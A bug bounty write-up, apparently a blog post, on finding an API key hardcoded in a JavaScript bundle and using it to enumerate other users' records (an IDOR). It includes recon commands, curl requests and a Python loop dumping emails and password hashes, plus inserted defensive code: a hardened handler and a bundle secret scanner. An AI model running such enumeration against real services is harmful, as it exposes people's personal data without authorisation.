Bug bounty hunting is a rollercoaster of emotions. Some days, you’re on top of the world, discovering critical vulnerabilities, and other days, you’re drowning in false positives and duplicate reports. Today was one of those golden days when patience and persistence paid off. I stumbled upon an information disclosure vulnerability that could have easily been awarded an $800+ bounty.
Here’s my full journey — from frustration to victory — detailing my recon techniques, code examples, and proof of exploitation.
I started with my usual methodology:
Target Selection: I was testing a private bug bounty program on HackerOne, focusing on an enterprise-level SaaS product.
Subdomain Enumeration: I used subfinder, amass, and crt.sh to gather subdomains.
Directory Bruteforcing: I ran ffuf to uncover hidden directories and endpoints.
JS File Analysis: I extracted and analyzed JavaScript files using linkfinder and gf patterns.
Commands Used:
subfinder -d target.com | tee subs.txt
amass enum -passive -d target.com -o amass_subs.txt
cat subs.txt amass_subs.txt | sort -u > all_subs.txt
After merging and cleaning up the subdomains, I checked for sensitive files like robots.txt, .env, and .git. Nothing juicy. Then, I moved on to analyzing JavaScript files for endpoints.
While analyzing JS files, I came across an internal API endpoint hardcoded in main.js:
const API_KEY = "AIzaSyD-EXAMPLE-KEY";
fetch("https://api.target.com/v1/user/details", {
  method: "GET",
  headers: {
    "Authorization": `Bearer ${API_KEY}`
  }
}).then(response => response.json())
  .then(data => console.log(data));
Immediately, my hacker instincts kicked in.
Step 1: Check if the API key was valid.
Step 2: Test if it had access to sensitive user data.
Step 3: Try unauthorized access by modifying API parameters.
I used cURL to test the API:
curl -H "Authorization: Bearer AIzaSyD-EXAMPLE-KEY" "https://api.target.com/v1/user/details"
Boom! It returned full user details, including email addresses, usernames, and even hashed passwords! This was a major security flaw, as an attacker could easily enumerate users.
I wanted to see if I could escalate this bug. I played around with the API by changing the user_id parameter:
curl -H "Authorization: Bearer AIzaSyD-EXAMPLE-KEY" "https://api.target.com/v1/user/details?user_id=123"
To my surprise, it worked! I was able to access details of other users just by iterating user_id. The lack of proper authentication checks made this a severe information disclosure vulnerability.
To make this more efficient, I wrote a Python script to extract user data:
import requests

api_key = "AIzaSyD-EXAMPLE-KEY"
url = "https://api.target.com/v1/user/details?user_id={}"

# Walk a range of user IDs with the key lifted from main.js
for user_id in range(1, 100):
    headers = {"Authorization": f"Bearer {api_key}"}
    response = requests.get(url.format(user_id), headers=headers)
    if response.status_code == 200:
        print(response.json())
This script iterated over user IDs and dumped sensitive user information, proving the severity of the issue.
I immediately reported the issue to the bug bounty platform, providing:
Steps to Reproduce
Impact Analysis
PoC Script
Suggested Fixes (e.g., implementing OAuth properly, rate limiting, and checking user permissions)
Within 24 hours, the security team acknowledged the bug and classified it as High Severity. A few days later, I received an $800 bounty — not bad for a few hours of work!
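To make the suggested fixes concrete, here is the flawed handler pattern the post describes next to a hardened version that applies all three recommendations (per-user credentials instead of the key shipped in the bundle, rate limiting, and an object-level permission check), plus response minimisation so a password hash can never leave the server. This is an added illustration, not code from the post or from the target's API: there is no web framework, a request is a plain dict with "headers" and "params", and the users, session tokens and hashes are constructed placeholders.

```python
"""Flawed vs hardened /v1/user/details handler (hypothetical, added example).

No web framework: a request is a dict with "headers" and "params", and the
handlers return (status, body). All users, tokens and hashes are constructed.
"""
import time
from collections import defaultdict, deque

# Constructed sample table; the hashes are placeholders, not real digests.
USERS = {
    1: {"username": "alice", "email": "alice@example.test", "password_hash": "<hash-1>"},
    2: {"username": "bob", "email": "bob@example.test", "password_hash": "<hash-2>"},
}
# The single key shipped in main.js: every visitor of the site can read it.
SHARED_FRONTEND_KEY = "AIzaSyD-EXAMPLE-KEY"
# Hypothetical per-user session tokens issued at login (values constructed).
SESSIONS = {"tok-alice": 1, "tok-bob": 2}
PUBLIC_FIELDS = ("username", "email")


def _bearer(request):
    auth = request["headers"].get("Authorization", "")
    return auth[len("Bearer "):] if auth.startswith("Bearer ") else ""


def vulnerable_user_details(request):
    """The pattern the post found: a shared key authenticates, user_id selects the row."""
    if _bearer(request) != SHARED_FRONTEND_KEY:
        return 401, {"error": "unauthorized"}
    raw = request["params"].get("user_id")
    if raw is None:                                   # no id: dump the whole table
        return 200, [dict(row, id=uid) for uid, row in USERS.items()]
    row = USERS.get(int(raw))
    if row is None:
        return 404, {"error": "not found"}
    return 200, dict(row)                             # every column, hash included


class RateLimiter:
    """Sliding window per principal: at most `limit` calls in any `window` seconds."""

    def __init__(self, limit, window):
        self.limit, self.window = limit, window
        self.calls = defaultdict(deque)

    def allow(self, key, now=None):
        now = time.monotonic() if now is None else now
        q = self.calls[key]
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


LIMITER = RateLimiter(limit=5, window=60)


def hardened_user_details(request, now=None):
    """Authenticate the caller, rate-limit, authorize the object, minimise the output."""
    caller_id = SESSIONS.get(_bearer(request))
    if caller_id is None:                             # the bundle key is not a session
        return 401, {"error": "unauthorized"}
    if not LIMITER.allow(caller_id, now):             # denied attempts count as well
        return 429, {"error": "rate limited"}
    raw = request["params"].get("user_id")
    try:
        requested = caller_id if raw is None else int(raw)
    except ValueError:
        return 400, {"error": "bad user_id"}
    if requested != caller_id:                        # object-level authorization
        return 403, {"error": "forbidden"}
    row = USERS[caller_id]
    return 200, {k: row[k] for k in PUBLIC_FIELDS}   # never the password hash


def make_request(token, user_id=None):
    """Build the dict the handlers expect; mirrors the post's curl calls."""
    params = {} if user_id is None else {"user_id": str(user_id)}
    return {"headers": {"Authorization": f"Bearer {token}"}, "params": params}


if __name__ == "__main__":
    print(vulnerable_user_details(make_request(SHARED_FRONTEND_KEY, 2)))
    print(hardened_user_details(make_request(SHARED_FRONTEND_KEY, 2)))
    print(hardened_user_details(make_request("tok-alice", 2)))
    print(hardened_user_details(make_request("tok-alice")))
```

Two design choices worth noting: the rate limiter runs before the authorization check, so a caller who keeps guessing other users' IDs burns their own budget on every 403; and the hardened handler looks the row up by the authenticated principal, so the client-supplied user_id can only confirm, never change, whose record is returned.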
Always Analyze JavaScript Files — API keys, endpoints, and tokens are often leaked here.
Test API Authentication Properly — Try unauthorized access with modified parameters.
Automate Recon & Testing — Use Python scripts to scale vulnerability testing.
Report Responsibly — Provide clear PoCs and mitigation steps for faster bounty payouts.
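For the first takeaway, the same analysis can run on the defending side before a bundle ships. Below is a small scanner that flags string literals assigned to credential-looking names, well-known key shapes, and constants that end up interpolated into an Authorization header, and fails the build when any of those appear. It is an added example, not the author's tooling and not linkfinder or gf; the bundle text is constructed to resemble the snippet in the post, and the rule set is a starter list you would extend for your own key formats.

```python
"""Secret and endpoint scanner for JavaScript bundles (hypothetical, added example).

Intended as a pre-release check on the built bundle; the rules below are a small
starter set and the bundle text is constructed to resemble the snippet in the post.
"""
import re

SAMPLE_BUNDLE = """\
const API_KEY = "AIzaSyD-EXAMPLE-KEY";
const cfg = { apiBase: "https://api.target.com/v1", debug: false };
fetch("https://api.target.com/v1/user/details", {
  headers: { "Authorization": `Bearer ${API_KEY}` }
});
const token = localStorage.getItem("session");   // runtime value, no literal to flag
"""

# Rule 1: a string literal assigned to a credential-looking name.
ASSIGNED_SECRET = re.compile(
    r"\b(?P<name>[A-Za-z_]*(?:api_?key|secret|token|password)[A-Za-z_]*)"
    r"\s*[:=]\s*['\"](?P<value>[^'\"]{8,})['\"]",
    re.IGNORECASE,
)
# Rule 2: well-known key shapes, whatever the variable is called. The post's
# placeholder key is shorter than a real Google key, so only rule 1 fires on it.
KNOWN_SHAPES = {
    "google_api_key": re.compile(r"AIza[0-9A-Za-z_-]{35}"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
}
# Rule 3: a constant from rule 1 interpolated into an Authorization header.
STATIC_BEARER = re.compile(r"Authorization['\"]?\s*:\s*`Bearer \$\{(?P<name>\w+)\}`")
# Inventory only: absolute URLs, so reviewers see which APIs the bundle talks to.
ENDPOINT = re.compile(r"https?://[^\s'\"`]+")

BLOCKING_KINDS = {"hardcoded_secret", "known_key_shape", "static_bearer_token"}


def redact(value):
    """Keep enough of the value to locate it, not enough to reuse it."""
    return value[:4] + "..." + value[-2:] if len(value) > 8 else "***"


def scan_bundle(source):
    """Return a list of findings, each a dict with line, kind, name and a redacted value."""
    findings, constants = [], {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in ASSIGNED_SECRET.finditer(line):
            constants[m.group("name")] = m.group("value")
            findings.append({"line": lineno, "kind": "hardcoded_secret",
                             "name": m.group("name"), "value": redact(m.group("value"))})
        for shape, rx in KNOWN_SHAPES.items():
            for m in rx.finditer(line):
                findings.append({"line": lineno, "kind": "known_key_shape",
                                 "name": shape, "value": redact(m.group(0))})
        for m in STATIC_BEARER.finditer(line):
            if m.group("name") in constants:     # header built from a flagged literal
                findings.append({"line": lineno, "kind": "static_bearer_token",
                                 "name": m.group("name"), "value": "(see constant)"})
        for m in ENDPOINT.finditer(line):
            findings.append({"line": lineno, "kind": "endpoint",
                             "name": "", "value": m.group(0)})
    return findings


def has_blocking_findings(findings):
    """True when the release should be stopped (anything other than an endpoint)."""
    return any(f["kind"] in BLOCKING_KINDS for f in findings)


if __name__ == "__main__":
    results = scan_bundle(SAMPLE_BUNDLE)
    for f in results:
        print(f"line {f['line']:>3}  {f['kind']:<20} {f['name']:<10} {f['value']}")
    raise SystemExit(1 if has_blocking_findings(results) else 0)
```

Run as a CI step, the non-zero exit on a blocking finding stops the deploy; the endpoint inventory is reported but not blocking, since a bundle legitimately names the APIs it calls and the value is in knowing which ones now need per-user authorization on the server side.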
Bug bounty hunting is all about persistence. Some days are frustrating, but one lucky find can make it all worthwhile.
🔴 YouTube: youtube.com/@theindiannetwork
📝 Medium Blog: theindiannetworks.blogspot.com
📧 Email: theindiannetwork@protonmail.com
If you found this article helpful, make sure to subscribe to my YouTube channel & Follow Me on Medium for more cybersecurity content!